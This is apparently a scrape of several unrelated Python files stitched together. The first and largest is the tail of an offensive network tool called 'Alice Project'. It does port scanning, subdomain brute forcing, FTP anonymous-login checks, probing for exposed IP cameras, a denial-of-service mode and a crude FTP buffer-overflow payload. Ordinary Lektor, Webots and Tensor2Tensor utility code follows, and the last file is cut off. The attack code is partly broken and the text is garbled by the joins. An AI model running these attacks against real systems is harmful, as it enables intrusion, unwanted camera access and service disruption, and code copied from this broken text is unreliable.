socks.send(payloads.encode())
except KeyboardInterrupt:
break
except ConnectionResetError:
socks.close()
socks = create_socket(IPv4=True, IPv6=False)
socks.connect((dest, int(port)))
except KeyboardInterrupt:
print("[-] Cannot exit now!")
pass
elif services == "dns-brute":
print("[*] Preparing to attack ==> %s " %(dest,))
os.chdir("lists")
words = []
with open("wordlist_subdomain_10mil.txt", 'r') as file:
for lines in file:
word = lines.strip()
words.append(word)
def checks(domain, target, port):
def create_socket(IPv4):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
sock_ipv4 = create_socket(IPv4=True)
try:
conver = socket.gethostbyaddr(target)[0]
#target_dns = conver[0]
consr = conver.split(".")
if len(consr) > 3:
combs = consr[2] + "." + consr[3]
#print("12412264789641248912894124678")
#print(combs)
return combs
else:
combs = consr[1] + "." + consr[2]
return combs
except:
print("\x0A")
print("[-] Couldn't get Address entry point . . ")
print("\x0A")
combs = input("[*] Enter hostname by yourself: ")
return combs
def enumerats(target, domain, falsive):
combs = domain +"." +target
def check_con_to_host(target):
def create_sock(IPv4):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
sock = create_sock(IPv4=True)
if falsive == True:
try:
sock.settimeout(1)
sock.connect((target, 80))
payloads = f"GET / HTTP/1.1\r\n"
payloads += "Accept: */*\r\n"
payloads += f"User-Agent: Alice Project/Webcrawler1.1 \r\n"
payloads += "Host: %s \r\n" %(target,)
payloads += "Accept-Encoding: 'en_US' \r\n"
payloads += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payloads.encode())
data = sock.recv(148142).decode()
if '200 OK' in data:
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target) + " Bytes recieved: %d Bits: %d" %(len(data), len(data)*8))
elif '301 Moved' in data:
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target) + " Bytes recieved: %d Bits: %d" %(len(data), len(data)*8))
elif '302 Found' in data:
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target) + " Bytes recieved: %d Bits: %d" %(len(data), len(data)*8))
else:
print(data)
return "[x] %s doesn't exists . .. " %(target,)
except Exception:
return "[x] %s doesn't exists .. . " %(target,)
else:
try:
sock.settimeout(1)
sock.connect((target, 80))
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target))
except Exception:
#print(f)
return "[x] %s doesn't exists . . " %(target)
check_connection = check_con_to_host(target=combs)
return check_connection
apps =[]
ip = checks(domain="var", target=dest, port=80)
print("\x0A")
print("[*] Big flow of data incoming!")
y_n = input("[?] Do you want to not show the data or show the flow (y/n): ")
print("\x0A")
y_n2 = input("[?] Do you want to send useragents, requests to see what codes the services are returning (y/n): ")
y_n2 = y_n2.lower()
y_n = y_n.lower()
if y_n2 == "y":
falsive = True
else:
falsive = False
for cons in words:
enum = enumerats(target=ip, domain=cons, falsive=falsive)
if y_n == 'y':
apps.append(enum)
else:
print(enum)
elif services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower().strip()
print(get_vers)
if 'apache' in get_vers:
version = "Apache"
elif 'nginx' in get_vers:
version = "Nginx"
else:
version = "Unknown"
#ip-camera-find
else:
version = "Unknown"
service = "HTTP"
if int(port) == 21:
if services == "FTP-bof":
print("[*] Checking Buffer Overflow . .. . ")
def buffer_create(amount):
if os.name == "posix":
buff = [] # DIR in windows which is equivelent to this buffer. So It means jne sys call ret int ret, which int is 2E, lets give the buffer a little
else:
buff = []
while len(buff) < 3:
singo = "\x75\x6e\x6c\x75\x63\x6b\x79\x20\x6f\x72\x20\x6c\x75\x63\x36\xb7\x92\x06\x46\x17\x92"
rce = "\x44\x49\x52"
#xz = binascii.hexlify("ls".encode()).decode()
#print(xz)
rce = "\x6c\x73"
buff.append(rce + "\x0A" + "A"*amount + "\x75\x03\x0f\x05\xC3\xCD\x2E\x0A"+rce)
return buff
create_ = buffer_create(amount=1000)
for contents in create_:
print("[*] Sending total bytes: %d " %(len(contents)))
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
datax = sock.recv(18412)
sock.send(contents.encode())
try:
sock.settimeout(5)
dat = sock.recv(12481).decode()
if '500' in dat:
print("[-] Command not understood. Probably, make A more?")
elif '530' in dat:
print("[-] Exploitation didn't worked out .. . ")
else:
print(dat)
except Exception as f:
print(f)
print("[-] None . . . ")
pass
elif services == "FTP-anon":
print("[*] Checking Anonymous Login . . .")
def anon_check(dest, port, timeout):
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
data = "USER Anonymous\r\nPASS Anonymous\r\n"
sock.recv(148212).decode()
sock.send(data.encode())
data_1 = sock.recv(14121).decode()
#print(data_1)
if 'Anonymous user logged in' in data_1:
return "[+] Anonymous login is enabled!"
else:
return "[-] Anonymous login is disabled!"
ano = anon_check(dest=dest, port=port, timeout=5)
print(ano)
elif services == "FTP-login":
print("[*] Checking banners and answers .. . ")
def login_check(dest, port, timeout):
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
data = "USER 123\r\nPASS 321\r\n"
xr = sock.recv(14812).decode().lower()
#print(xr)
if 'pure' in xr:
print("[*] Version is PureFTPD")
sock.send(data.encode())
data = sock.recv(124812311).decode().lower()
data2 = sock.recv(12418412).decode().lower()
# print(data2)
if '331' in data:
banner1 = "[+] 1st banner is 331"
if '530' in data2:
banner = "[+] Banner is 530"
if 'login incorrect' in data2:
msg = "[+] Message: Login Incorrect!"
return banner1 + "\n" + banner + "\n"+ msg
ano = login_check(dest=dest, port=port, timeout=5)
print(ano)
service = "FTP"
version = "Unknown"
else:
service = "Unknown"
version = "Unknown"
if int(port) == 22:
if services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower()
if 'openssh' in get_vers:
version = "OpenSSH"
else:
version = "Unknown"
service = "SSH"
elif int(port) == 25:
if services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower()
if 'esmtp exim' in get_vers:
version = "ESMTP Exim"
else:
version = "Unknown"
else:
version = "Unknown"
elif int(port) == 8080:
if services == "ip-camera-find":
print("[*] Checking IP Camera access . .. .")
def camera(IP, port):
#database = ["control/camerainfo"]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, port))
payload = "GET / HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
if os.name == "posix":
system = "POSIX-x86"
else:
system = "WIN-NTX64"
payload += f"User-Agent: Alice Project x64-bit/{system}/web-crawler/version/1.3.8/MSG:'You are all going to die down here!'\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
rcv = sock.recv(18412).decode()
return rcv
check = camera(IP=dest, port=int(port))
service = "HTTP-PROXY"
if '200 OK' in check:
print("[+] Camera access is availiable!")
elif 'webcamXP 5' in check:
print("[+] Camera access is availiable!")
version = "webcamXP 5"
else:
print(check)
elif services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower()
if "apache" in get_vers:
service = "HTTP-PROXY"
else:
service = "HTTP-PROXY"
elif int(port) == 8084:
if services == "ip-camera-find":
print("[*] Checking IP Camera access . . .. ")
def camera(IP, port):
sock =socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, port))
payload = "GET /gallery.html HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
payload += "User-Agent: Alice Project Hnoob/20.1.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
rcv = sock.recv(1321312).decode()
#print(rcv)
return rcv
check = camera(IP=dest, port=int(port))
if 'webcamXP 5' in check:
print("[+] Camera aacess is availiable!")
elif '200 OK' in check:
print("[+] Camera access is availiable!")
else:
if services == "ip-camera-find":
print("[*] Checking IP Camera Access . .. . ")
def camera(IP, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
payload = "GET /gallery.html HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
payload += f"User-Agent: Alice Project Hnoob/20.1.8/x64-bit/{os.name}/Webbrowser-socket-crawler\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
recv = sock.recv(128412421).decode()
return recv
                            check = camera(IP=dest, port=port)
if 'webcamXP 5' in check:
print("[+] Camera access is availiable!")
elif '200 OK' in check:
print("[+] Camera acess is availiable!")
else:
if int(port) == 80:
service = "HTTP"
state = "Closed"
version = "Unknown"
elif int(port) == 21:
service = "FTP"
state = "Closed"
version = "Unknown"
else:
service = "Unknown"
state = "Closed"
version = "Unknown"
print('''
Target: %s
[Port] [ State ] [Service] [ Version ]
%d %s %s %s
''' %(dest, int(port), state, service, version))
sys.exit(5)
threads = Thread(target=umast)
vr = threads.start()
def init_1(dest, version, verbose, service_scan, ranging, output):
#print(dest)
if output != None:
ols = open(output, 'w')
else:
ols = None
version_ip = version
def umast():
timer = 0
if ols != None:
ols.write('''
Alice [Initiated Scan] on host ===> %s
Total ports to scan: %d''' %(dest, int(ranging)))
print('''
Alice [Initiated Scan] on host hive: %s
=============================================
Total ports remaining: [%s] ''' %(dest,ranging))
versioner = []
for porting in range(int(ranging)):
#print(porting)
#print(dest)
pkt = sr1(IP(dst=dest)/TCP(dport=porting, sport=555), timeout=0.3, verbose=0)
#print(porting)
timer += 1
def get(dest, port, timeout, version):
version_ip = version
if version_ip == "IPv6":
_sock_ = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
_sock_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
_sock_.connect((dest, int(porting)))
_sock_.settimeout(timeout)
_sock_.send("GET /DATA HTTP/1.1\n".encode())
_sock_.send("LOL\n".encode())
try:
recv = _sock_.recv(14821).decode()
except Exception as f:
print(f)
return "None"
return recv
if pkt != None:
if pkt.haslayer(TCP):
if pkt[TCP].flags == 18:
print('''
                        Discovered an open port %d on hive [%s]''' %(porting, dest))
#print("DASSADA")
state = "Open"
if int(porting) == 80:
#print("12347861287412")
print(service_scan)
if service_scan == "ip-camera-find":
print("[*] Checking for camera access . .. ")
def ip_camera(IP, port, timeout):
database = ["control/camerainfo"]
for contents in database:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
payload = "GET /%s HTTP/1.1\r\n" % (contents)
payload += "Accept: */*\r\n"
payload += "User-Agent: Xenu Link Sleuth/1.3.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
                                        data = sock.recv(18412).decode()
                                        return data
check = ip_camera(IP=dest, port=porting, timeout=5)
if check != None:
if '200 OK' in check:
print("[*] Access to camera availiable!")
else:
print('[-] No access to camera found on port %d ' %(porting))
elif service_scan != "off":
get_vers = get(dest=dest, port=porting, timeout=5, version=version_ip)
get_vers = get_vers.lower()
else:
get_vers = "off"
if 'nginx' in get_vers:
version = "Nginx"
service = "HTTP"
elif 'apache' in get_vers:
version = "Apache"
service = "HTTP"
elif get_vers == "off":
version = "Off"
service = "HTTP"
else:
version = "Unknown"
service = "HTTP"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
elif int(porting) == 21:
#print("213961284612879412789")
#print(service_scan)
if service_scan != "off":
get_vers = get(dest=dest, port=porting, timeout=5, version=version_ip)
get_vers = get_vers.lower()
elif service_scan == "FTP-anon":
def get(dest, port):
data = "USER Anonymous\r\nPASS Anonymous\r\n"
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
sock.recv(14812).decode()
sock.send(data.encode())
dt = sock.recv(12312123).decode()
if 'Anonymous user logged in' in dt:
return "[+] Anonymous login enabled!"
else:
return "[-] Anonymous login disabled!"
get_ban = get(dest=dest, port=porting)
print(get_ban)
#get_vers = get_ban.lower()
#print(get_vers)
else:
get_vers = "off"
if 'pure' in get_vers:
version = "PureFTPD"
service = "FTP"
if 'anonymous' in get_vers:
version = get_vers
service = "FTP"
elif 'pro' in get_vers:
version = "ProFTPD"
service = "FTP"
elif get_vers == "off":
version = "off"
service = "Off"
else:
version = "Unknown"
service = "FTP"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
elif int(porting) == 8080:
if service_scan == "ip-camera-find":
print("[*] Checking for camera .. . ")
def IP_camera(IP, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
payload = "GET /%s HTTP/1.1\r\n" % (contents)
payload += "Accept: */*\r\n"
payload += "User-Agent: Xenu Link Sleuth/1.3.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
rcv = sock.recv(1284124).decode()
return rcv
check = IP_camera(IP=dest, port=porting)
if 'webcam' in check:
print("[*] Webcam access availiable!")
service = "HTTP-PROXY"
version = "unknown"
elif service_scan != "off":
service = "HTTP-PROXY"
def get(IP, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
sock.send("bytesofdata\r\n".encode())
rcv = sock.recv(141221).decode()
vers = get(IP=dest, port=porting)
vers = vers.lower()
if 'apache' in vers:
version = "Apache"
else:
version = "Unknown"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
elif int(porting) == 22:
#print("12347861287412")
if service_scan != "off":
get_vers = get(dest=dest, port=porting, timeout=5, version=version_ip)
get_vers = get_vers.lower()
else:
get_vers = "off"
if 'openssh' in get_vers:
version = "OpenSSH"
service = "SSH"
elif get_vers == "off":
version = "off"
service = "SSH"
else:
version = "Unknown"
service = "SSH"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
else:
version = "Unknown"
service = "Unknown"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
#print(versioner)
print('''
Target: %s
Time Elapsed: %d
Port State Service Version ''' %(dest, timer))
for crisis in versioner:
if ols != None:
ols.write('''
%s'''%(crisis))
print(crisis)
if ols != None:
ols.close()
threads = Thread(target=umast)
threading.MAX_TIMEOUT = 0
threads.start()
def __main__():
parsie = argparse.ArgumentParser()
parsie.add_argument("-t", "--target", help='Specify IPv4, IPv6 Address, DNS. E.G --target google.com or --target "google.com, host.com"',required=True)
parsie.add_argument("-sV", "--servicevers", help="Service || Version Enumeration of the provided target. Default: Off | Usage: --servicevers on", default="off", required=False)
parsie.add_argument("-r", "--rangeport", help="Specify a maximum range - Default is 1000 ports", default=1000,required=False)
parsie.add_argument('-p', "--port", help="Specify a specific port to be checked", default=0, required=False)
parsie.add_argument("-v", "--vulners", help="type - --vulners help for more help", default=None)
parsie.add_argument("-o", "--output", help="Argument a name of a file. E.G --output file.txt | Default: none",default=None, required=False)
args = parsie.parse_args()
target = args.target
serivevers = args.servicevers
rangeport = args.rangeport
port = args.port
vulnery = args.vulners
if vulnery == "help":
print('''
[Modes that are active]
1. ftp-anon-auth : Checks for FTP Anonymous Authentication.
2. ftp-auth-login : Checks for FTP Login Answers, Banners.
3. ftp-bof-allvers : Checks for Buffer Overflow (BOF - Stack Overflow) Vulnerability - With injecting specific code.
4. ip-camera-find : Checks for a camera entry through IP or Hostname.
5. enc-bof-allvers : Checks for HTTP Buffer Overflow (BOF - Stack Overflow) Vulnerability - With sending broken, bad chars or exceeds the limit of them.
6. http-dos : Denial Of Service Attack.
7. dns-brute : Domain Name System brute force attack.
''')
sys.exit(1)
output = args.output
if port != 0:
if ',' in target:
if serivevers != "off":
splitted = target.split(",")
for targets in splitted:
returned_code = check(dest=targets, port=port)
sys.exit(5)
#print(returned_code)
else:
if serivevers != "off":
if vulnery != None:
if vulnery == "ftp-anon-auth":
returned_code = check(dest=target, port=port, services="FTP-anon")
elif vulnery == "ftp-bof-allvers":
returned_code = check(dest=target, port=port, services="FTP-bof")
elif vulnery == "ftp-auth-login":
returned_code = check(dest=target, port=port, services="FTP-login")
elif vulnery == "ip-camera-find":
returned_code = check(dest=target, port=port, services="ip-camera-find")
elif vulnery == "enc-bof-allvers":
returned_code = check(dest=target, port=port, services="enc-bof-allvers")
elif vulnery == "http-dos":
returned_code = check(dest=target, port=port, services="http-dos")
elif vulnery == "dns-brute":
returned_code = check(dest=target, port=port, services="dns-brute")
else:
returned_code = check(dest=target, port=port, services=True)
sys.exit(5)
else:
if vulnery != None:
if vulnery == "ftp-anon-login":
returned_code = check(dest=target, port=port, services="FTP-anon")
elif vulnery == "ftp-bof-allvers":
returned_code = check(dest=target, port=port, services="FTP-bof")
elif vulnery == "ftp-auth-login":
returned_code = check(dest=target, port=port, services="FTP-login")
elif vulnery == "ip-camera-find":
returned_code = check(dest=target, port=port, services="ip-camera-find")
else:
returned_code = check(dest=target, port=port, services=False)
sys.exit(5)
#print(returned_code)
if serivevers != "off":
if ',' in target:
splitted = target.split(",")
#print(splitted)
for target_protoc in splitted:
#print(target_protoc)
if ':' in target_protoc:
addr = "IPv6"
else:
addr = "IPv4"
target_protoc = target_protoc.strip()
init_1(dest=target_protoc, version=addr, verbose=1, service_scan="on", ranging=rangeport, output=output)
else:
if ':' in target:
addr = "IPv6"
else:
addr = "IPv4"
if vulnery != None:
if vulnery == "ftp-anon-login":
init_1(dest=target, version=addr, verbose=1, service_scan="FTP-anon", ranging=rangeport, output=otuput)
elif vulnery == "ftp-bof-allvers":
init_1(dest=target, version=addr, verbose=1, service_scan="ftp-bof-allvers", ranging=rangeport, output=output)
elif vulnery == "ip-camera-find":
init_1(dest=target, version=addr, verbose=1, service_scan="ip-camera-find", ranging=rangeport, output=output)
else:
init_1(dest=target, version=addr, verbose=1, service_scan="on", ranging=rangeport, output=output)
else:
if ',' in target:
splitted = target.split(',')
for target_protoc in splitted:
#print(target_protoc)
if ':' in target_protoc:
addr = "IPv6"
else:
addr = "IPv4"
target_protoc = target_protoc.strip()
init_1(dest=target_protoc, version=addr, verbose=1, service_scan="off", ranging=rangeport, output=output)
else:
if ':' in target:
addr = "IPv6"
else:
addr = "IPv4"
if vulnery != None:
if vulnery == "ftp-anon-auth":
init_1(dest=target, version=addr, verbose=1, service_scan="FTP-anon", ranging=rangeport, output=output)
elif vulnery == "ftp-bof-allvers":
init_1(dest=target, version=addr, verbose=1, service_scan="ftp-bof-allvers", ranging=rangeport, output=output)
elif vulnery == "ip-camera-find":
init_1(dest=target, version=addr, verbose=1, service_scan="ip-camera-find", ranging=rangeport, output=output)
else:
init_1(dest=target, version=addr, verbose=1, service_scan="off", ranging=rangeport, output=output)
__main__()
|
devserver.py
|
import os
import time
import traceback
import threading
from werkzeug.serving import run_simple, WSGIRequestHandler
from lektor.db import Database, DatabaseCache
from lektor.builder import Builder, process_extra_flags
from lektor.watcher import Watcher
from lektor.reporter import CliReporter
from lektor.admin import WebAdmin
from lektor.utils import portable_popen
_os_alt_seps = list(sep for sep in [os.path.sep, os.path.altsep]
if sep not in (None, '/'))
class SilentWSGIRequestHandler(WSGIRequestHandler):
def log(self, type, message, *args):
pass
class BackgroundBuilder(threading.Thread):
def __init__(self, env, output_path, prune=True, verbosity=0,
extra_flags=None):
threading.Thread.__init__(self)
watcher = Watcher(env, output_path)
watcher.observer.start()
self.env = env
self.watcher = watcher
self.output_path = output_path
self.prune = prune
self.verbosity = verbosity
self.last_build = time.time()
self.extra_flags = extra_flags
def build(self, update_source_info_first=False):
try:
db = Database(self.env)
builder = Builder(db.new_pad(), self.output_path,
extra_flags=self.extra_flags)
if update_source_info_first:
builder.update_all_source_infos()
builder.build_all()
if self.prune:
builder.prune()
except Exception:
traceback.print_exc()
else:
self.last_build = time.time()
def run(self):
with CliReporter(self.env, verbosity=self.verbosity):
self.build(update_source_info_first=True)
for ts, eventtype, absolute_filename_w_path in self.watcher:
DatabaseCache.purge_cache()
if self.last_build is None or ts > self.last_build:
self.build()
class DevTools(object):
"""This provides extra helpers for launching tools such as webpack."""
def __init__(self, env):
self.watcher = None
self.env = env
def start(self):
if self.watcher is not None:
return
from lektor import admin
admin = os.path.dirname(admin.__file__)
portable_popen(['npm', 'install', '.'], cwd=admin).wait()
self.watcher = portable_popen([os.path.join(
admin, 'node_modules/.bin/webpack'), '--watch'],
cwd=os.path.join(admin, 'static'))
def stop(self):
if self.watcher is None:
return
self.watcher.kill()
self.watcher.wait()
self.watcher = None
def browse_to_address(addr):
import webbrowser
def browse():
time.sleep(1)
webbrowser.open('http://%s:%s' % addr)
t = threading.Thread(target=browse)
t.daemon = True
t.start()
def run_server(bindaddr, env, output_path, prune=True, verbosity=0,
lektor_dev=False, ui_lang='en', browse=False, extra_flags=None):
"""This runs a server but also spawns a background process. It's
not safe to call this more than once per python process!
"""
wz_as_main = os.environ.get('WERKZEUG_RUN_MAIN') == 'true'
in_main_process = not lektor_dev or wz_as_main
extra_flags = process_extra_flags(extra_flags)
if in_main_process:
background_builder = BackgroundBuilder(env, output_path=output_path,
prune=prune, verbosity=verbosity,
extra_flags=extra_flags)
background_builder.daemon = True
background_builder.start()
env.plugin_controller.emit('server-spawn', bindaddr=bindaddr,
extra_flags=extra_flags)
app = WebAdmin(env, output_path=output_path, verbosity=verbosity,
debug=lektor_dev, ui_lang=ui_lang,
extra_flags=extra_flags)
dt = None
if lektor_dev and not wz_as_main:
dt = DevTools(env)
dt.start()
if browse:
browse_to_address(bindaddr)
try:
return run_simple(bindaddr[0], bindaddr[1], app,
use_debugger=True, threaded=True,
use_reloader=lektor_dev,
request_handler=WSGIRequestHandler if lektor_dev else SilentWSGIRequestHandler)
finally:
if dt is not None:
dt.stop()
if in_main_process:
env.plugin_controller.emit('server-stop')
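# Minimal usage sketch (hedged): the Project/make_env names below are assumed from
# Lektor's project API, and the paths are placeholders, not part of this module.
#
#   from lektor.project import Project
#   project = Project.discover('/path/to/project')
#   env = project.make_env()
#   run_server(('127.0.0.1', 5000), env, output_path='/tmp/lektor-build',
#              verbosity=1, browse=False)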
|
command.py
|
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch a system command."""
import os
import subprocess
import sys
import threading
class Command(object):
"""Launch a system command."""
def __init__(self, cmd, ansiEscape=False):
"""Constructor."""
self.ansiEscape = ansiEscape
self.cmd = cmd.split()
self.resetAttributes()
self.mainProcessMutex = threading.Lock()
def resetAttributes(self):
"""Reset the internal attributes."""
self.expectedStringFound = False
self.isTimeout = False
self.mainProcess = None
self.mainThread = None
self.returncode = 0
self.output = ''
def terminate(self, force):
"""Terminate the command."""
self.isRunningFlag = False
if self.mainProcess:
self.mainProcess.terminate()
if force and sys.platform == 'darwin' and self.mainProcess:
self.mainProcess.kill()
def isRunning(self):
"""Detect if the command is running."""
return self.mainProcess is not None
def stopMainProcess(self):
"""Stop the main process."""
if self.mainProcess:
self.mainProcess.terminate()
if self.mainThread:
self.mainThread.join()
self.mainProcess = None
self.mainThread = None
def run(self, timeout=None, expectedString=None, silent=True,
forceTermination=True, shell=False, redirectionFile=None):
"""Run the command and monitor STDERR and STDOUT pipe."""
def mainTarget():
if self.redirectionFile is None:
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
outFile = open(self.redirectionFile, "w")
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=outFile, stderr=outFile)
while self.mainProcess.poll() is None:
self.mainProcess.wait()
self.returncode = self.mainProcess.returncode
with self.mainProcessMutex:
self.mainProcess = None
if self.redirectionFile is not None:
outFile.close()
def outputWriterTarget():
while self.isRunningFlag:
line = ''
with self.mainProcessMutex:
if self.mainProcess:
line = self.mainProcess.stdout.readline() # blocking
if line:
self.output += line
if not self.silent:
if self.ansiEscape:
if line.startswith("OK: "):
line = '\033[92m' + line # green
elif line.startswith("FAILURE"):
line = '\033[91m' + line # red
else:
line = '\033[0m' + line
print(line[:-1])
if sys.platform == 'win32':
sys.stdout.flush()
def outputListenerTarget():
size = 0
while self.isRunningFlag:
if size != len(self.output):
if self.expectedString in self.output:
self.expectedStringFound = True
self.terminate(force=True)
return
size = len(self.output)
self.resetAttributes()
self.expectedString = expectedString
self.silent = silent
self.timeout = timeout
self.shell = shell
self.redirectionFile = redirectionFile
self.isRunningFlag = True
try:
self.outputWriterThread = threading.Thread(
target=outputWriterTarget)
self.outputWriterThread.start()
if expectedString:
self.outputListenerThread = threading.Thread(
target=outputListenerTarget)
self.outputListenerThread.start()
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
def runTest(self, timeout=None, silent=True, forceTermination=True,
shell=False):
"""Run the command and redirect the STDERR and STDOUT to files."""
def mainTarget():
outFile = open(self.outFileName, "w")
errFile = open(self.errFileName, "w")
self.returncode = subprocess.call(self.cmd, shell=shell, bufsize=1,
universal_newlines=True, stdout=outFile, stderr=errFile)
outFile.close()
errFile.close()
self.outFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stdout.txt'
self.errFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stderr.txt'
self.resetAttributes()
self.silent = silent
self.timeout = timeout
self.isRunningFlag = True
try:
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
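# Minimal usage sketch (illustrative command line and timeout, not a real test):
#
#   cmd = Command('webots --batch --mode=fast some_world.wbt')
#   cmd.run(timeout=120, expectedString='OK:', silent=False)
#   if cmd.isTimeout:
#       print('command timed out')
#   elif cmd.expectedStringFound:
#       print('expected output seen, return code %d' % cmd.returncode)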
|
common_video.py
|
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for video."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.layers import common_layers
import tensorflow as tf
from tensorflow.python.ops import summary_op_util
tfl = tf.layers
tfcl = tf.contrib.layers
def swap_time_and_batch_axes(inputs):
"""Swaps time and batch axis (the first two axis)."""
transposed_axes = tf.concat([[1, 0], tf.range(2, tf.rank(inputs))], axis=0)
return tf.transpose(inputs, transposed_axes)
def encode_to_shape(inputs, shape, scope):
"""Encode the given tensor to given image shape."""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
w, h = shape[1], shape[2]
x = inputs
x = tfl.flatten(x)
x = tfl.dense(x, w * h, activation=None, name="enc_dense")
x = tf.reshape(x, (-1, w, h, 1))
return x
def decode_to_shape(inputs, shape, scope):
